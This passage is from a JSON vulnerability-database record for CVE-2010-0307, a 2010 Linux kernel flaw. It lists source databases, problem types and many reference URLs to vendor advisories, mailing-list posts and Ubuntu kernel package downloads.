        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=fc09ad2748a073df3195434d27659026"
      },
      {
        "title": "VMware Security Advisories: VMware ESXi and ESX third party updates for Service Console and Likewise components",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=d087ff2df978e84e36dbce58f6a59022"
      },
      {
        "title": "VMware Security Advisories: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=ea953b0a91a1816979ec1d304d5e3d93"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2010-0307"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001203"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-160"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-Other",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001203"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0307"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "http://www.securityfocus.com/bid/38027"
      },
      {
        "trust": 2.1,
        "url": "http://support.avaya.com/css/p8/documents/100088287"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/archive/1/516397/100/0/threaded"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/38492"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/38779"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/38922"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/39649"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/43315"
      },
      {
        "trust": 1.8,
        "url": "http://www.vupen.com/english/advisories/2010/0638"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2010/dsa-1996"
      },
      {
        "trust": 1.8,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-february/035159.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2010:066"
      },
      {
        "trust": 1.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0146.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0398.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0771.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00000.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-914-1"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2010/02/01/1"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2010/02/01/5"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2010/02/04/1"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2010/02/04/9"
      },
      {
        "trust": 1.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.32.8"
      },
      {
        "trust": 1.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2011-0003.html"
      },
      {
        "trust": 1.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=560547"
      },
      {
        "trust": 1.8,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10870"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=221af7f87b97431e3ee21ce4b0e77d5411cf1549"
      },
      {
        "trust": 1.7,
        "url": "http://www.globalsecuritymag.com/vigil-nce-linux-kernel-denial-of%2c20100202%2c15754.html"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?t=126466700200002\u0026r=1\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=linux-mm\u0026m=126466407724382\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0307"
      },
      {
        "trust": 0.9,
        "url": "http://secunia.com/advisories/38354/"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-0307"
      },
      {
        "trust": 0.6,
        "url": "http://support.avaya.com/css/p8/documents/100079484"
      },
      {
        "trust": 0.4,
        "url": "http://marc.info/?l=linux-mm\u0026m=126466407724382\u0026w=4"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0415"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0307"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.3,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0415"
      },
      {
        "trust": 0.3,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1088"
      },
      {
        "trust": 0.2,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0003"
      },
      {
        "trust": 0.2,
        "url": "http://www.vmware.com/support/policies/eos_vi.html"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0291"
      },
      {
        "trust": 0.2,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.2,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1087"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0622"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0007"
      },
      {
        "trust": 0.2,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1321"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1437"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0309"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0622"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0410"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0291"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=linux-mm\u0026amp;m=126466407724382\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?t=126466700200002\u0026amp;r=1\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=221af7f87b97431e3ee21ce4b0e77d5411cf1549"
      },
      {
        "trust": 0.1,
        "url": "http://www.globalsecuritymag.com/vigil-nce-linux-kernel-denial-of,20100202,15754.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2010:0771"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/33585/"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/914-1/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3556"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0086"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1086"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0730"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027919"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2939"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3571"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0095"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0092"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3555"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3548"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1031330"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3554"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3562"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0088"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0091"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0089"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3557"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3550"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1384"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3567"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0086"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0837"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3553"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0106"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2227"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0107"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2902"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2901"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0091"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0841"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0840"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2248"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3561"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3541"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3559"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3565"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027904"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0107"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0433"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0842"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0082"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3574"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0886"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0734"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1157"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0094"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0007"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0850"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2524"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0839"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0090"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-3825"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3573"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-5416"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1384"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0088"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0849"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2070"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4308"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3549"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3548"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2693"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4308"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3568"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0084"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5416"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3864"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3825"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0410"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3572"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0092"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0003"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0094"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3566"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0847"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0740"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0082"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0437"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0844"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3548"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2066"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0089"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2902"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0087"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0087"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1436"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2693"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1029353"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0846"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2226"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1173"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0008"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1641"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2928"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0106"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0845"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0848"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0095"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1187"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2521"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3569"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0085"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0090"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2901"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3081"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3551"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0843"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.83.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.83_sparc.deb"
      },
      {
        "trust": 0.1,
